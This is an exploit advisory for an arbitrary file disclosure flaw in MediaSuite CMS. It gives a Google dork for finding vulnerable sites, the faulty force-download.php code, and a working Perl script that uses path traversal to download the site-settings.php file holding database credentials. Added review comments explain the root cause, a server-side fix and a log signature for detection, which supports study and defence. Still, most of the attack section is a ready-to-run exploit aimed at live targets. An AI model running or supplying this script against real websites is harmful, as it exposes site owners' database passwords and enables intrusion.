.______________ ||__/||_____\ _\_______ ____ ||\/ ||\\///_\\___ \_/ __ \ |\/^ /><\\_/ \| \/\___/ |___|/\____ |/__/\_ \\_____/__|\___> \/|__|\/\/\/ _____________________________ / _____/\_ _____/\_ ___ \ \_____\|__)_ /\\/http://twitter.com/h4SEC /\ |\\ \____ Proof Video: https://www.youtube.com/watch?v=7yxbfD1YK8Y /_______//_______/ \______/ ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] E-Mail : knockout@e-mail.com.tr [~] Twitter: http://twitter.com/h4SEC [~] HomePage : http://h4x0resec.blogspot.com - http://cyber-warrior.org - http://www.fiXen.org [~] Greetz: ZoRLu, DaiMon, VolqaN, DaiMon, KedAns-Dz , Septemb0x, BARCOD3, b3mb4m, SysToxic, EthicalHacker and all TurkSec Group members. ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : MediaSuite CMS - Arbitrary File Disclosure Exploit |~Price : N/A |~Version : All CMS |~Software: http://www.mediasuite.ca |~Vulnerability Style :File Disclosure |~Vulnerability Dir : / |~Google Dork : "MediaSuite.ca - Website Design, Media Marketing Suite - Barrie Ontario" |[~]Date : "20.04.2015" |[~]Exploit Tested on :>>>> www.mediasuite.ca ( Official Web ) <<<<< ---------------------------------------------------------- ---------------------Info;-------------------------------- ---------------------------------------------------------- The database password can be found easily: reading "site-settings.php" is sufficient, and that file can be read through this file-disclosure flaw. Careless, unchecked coding in the "force-download.php" file is what causes it. The laughable code responsible is shown below :) ################################################################################################## file in "force-download.php" .. .. .. $type = $_GET['type']; $file = $_GET['file']; if($type == "1"){ $filename = "../uploads/$file"; } .. .. .. 
# NOTE(review): the root cause is visible in the excerpt above: $file is taken
# straight from $_GET['file'] and concatenated into "../uploads/$file" with no
# validation, and readfile($filename) below then serves whatever that path
# resolves to. basename() is applied only to the Content-Disposition header
# value, never to the path that is actually read. Mitigation on the server
# side: accept only a bare file name (reject path separators and ".."), or
# resolve the path with realpath() and require the result to stay inside the
# uploads directory before any header()/readfile() call.
}
header("Pragma: public"); // required
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private",false); // required for certain browsers
header("Content-Type: $ctype");
// change, added quotes to allow spaces in filenames, by Rajkumar Singh
header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
header("Content-Transfer-Encoding: binary");
header("Content-Length: ".filesize($filename));
readfile("$filename");   # the unvalidated path reaches the file read here
exit();
..
...
##################################################################################################
##############################Exploit.pl#########################################################
##################################################################################################
# Proof-of-concept client for the advisory above. It issues a single HTTP GET
# for includes/force-download.php?type=1&file=../includes/site-settings.php
# under the host and web path given on the command line and saves the
# response body to ./site-settings.php in the current directory.
# Detection hint for defenders: a request to force-download.php whose "file"
# parameter contains ".." is the signature of this traversal and is easy to
# alert on in web-server or WAF logs.
# Style notes: no "use strict; use warnings;"; LWP::Simple is loaded but never
# used (only LWP::UserAgent is); the three system() calls below are Windows
# cmd.exe builtins (cls/title/color) and only decorate the console.
use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('title MediaSuite CMS - Artibary File Disclosure Exploit');
system('color 2');
# Usage check: at least the host and the web path must be supplied.
# "Su Sekilde Kocum" (Turkish) is roughly "Like this, buddy".
if(@ARGV < 2) {
    print "[-]Su Sekilde Kocum. \n\n";
    &help;   # &-call form; works here because help() is only declared further down
    exit();
}
# Prints the two usage lines ("Usaqe" is a typo for "Usage" in the output).
sub help() {
    print "[+] Usaqe : perl $0 Target /path/ \n";
    print "[+] Usage: perl $0 localhost / \n";
}
# Console banner.
print "\n************************************************************************\n";
print "\* MediaSuite CMS - Artibary File Disclosure Exploit *\n";
print "\* Exploit coded by : KnocKout*\n";
print "\* Contact : twitter.com/h4SEC *\n";
print "\* --*\n";
print "\*********************************************************************\n\n\n";
# The optional third argument is read into $File but immediately overwritten
# with the fixed traversal path on the next line, so it has no effect.
($TargetIP, $path, $File,) = @ARGV;
$File="includes/force-download.php?type=1&file=../includes/site-settings.php";
# Host and path are interpolated as given; no scheme/slash normalisation.
my $url = "http://" . $TargetIP . $path . $File;
print "\n Biraz Bekle. \n\n";   # "Wait a bit."
my $useragent = LWP::UserAgent->new();
# :content_file makes LWP write the response body directly to this local file.
# $request actually holds the HTTP::Response object, not the request.
my $request = $useragent->get($url,":content_file" => "site-settings.php");
if ($request->is_success) {
    # Success messages (Turkish): "exploit successful, well done to the coder";
    # "the file holding the database details (site-settings.php) was downloaded".
    print "[+] Exploit Basarili, kodlayanin eline saglik \n\n";
    print "[+] Exploit Basarili. !\n";
    print "[+] Database bilgilerinin yer aldigi (site-settings.php) dosyasi indirildi. 
\n";
    print "[+] h4 SEC \n";
    print "[+] Special tnX : ZoRLu, _UnDeRTaKeR, DaiMon, VoLqaN, BARCOD3, Septemb0x, EthicalHacker \n";
    exit();
}
else {
    # Any non-success status: echo the URL and the HTTP status line.
    # "Basarisiz" (Turkish) = "failed".
    print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n";
    exit();
}